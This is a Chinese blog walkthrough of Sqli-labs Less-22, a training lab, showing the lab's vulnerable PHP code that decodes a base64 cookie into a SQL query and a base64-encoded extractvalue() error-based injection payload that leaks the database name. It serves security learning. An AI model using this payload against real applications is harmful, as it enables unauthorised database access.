Apr 09 2020

Sqli-labs Less-22 cookie注入 base64编码 extractvalue()报错注入

作者: 绝缘体..   发布: 2020-04-09 22:06   分类: 未分类   阅读:   抢沙发  
 
更多

本关和less20、less21是一致的,我们可以从源代码中看到这里对uname进行了”uname”的处理

$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
$result=mysql_query($sql);
if (!$result)
	{
	die('Issue with your mysql: ' . mysql_error());
	}

可以构造payload:

admin” and extractvalue(1,concat(0x7e,(select database()),0x7e)) #

Payload进行base64编码后,修改cookie再进行提交

Cookie: uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSAj

可以看到数据库名为security

其他的payload请自行发散思维进行构造。

 

参考:https://www.cnblogs.com/lcamry/p/5763016.html

打赏

本文固定链接: https://www.cxy163.net/archives/4980 | 绝缘体

该日志由 绝缘体.. 于 2020年04月09日 发表在 未分类 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Sqli-labs Less-22 cookie注入 base64编码 extractvalue()报错注入 | 绝缘体
关键字: , , , ,
【上一篇】
【下一篇】

您可能还会对这些文章感兴趣!

  1. python黑帽子(第五章)
  2. python黑帽子(第二章)
  3. 子域名收集
  4. sqlmap Tamper脚本编写
  5. CDN绕过
  6. docker进阶_docker-compose
  7. mysql中int(1)是长度为1的int型吗?
  8. html5 画布时钟效果
  9. js去掉内容中所有html标记的方法
  10. PHP给源代码加密的几种方法
  11. Swoole实践:4-使用Swoole实现在线聊天
  12. 各大网站CSS代码初始化集合
  13. 微信图片禁止外链 此图片来自微信公众平台未经允许
  14. 最常用的100个PHP函数排行榜
  15. 使用php编程的一些经验总结
  16. BUUCTF-[WebLogic]CVE-2017-10271(反

Sqli-labs Less-22 cookie注入 base64编码 extractvalue()报错注入:等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter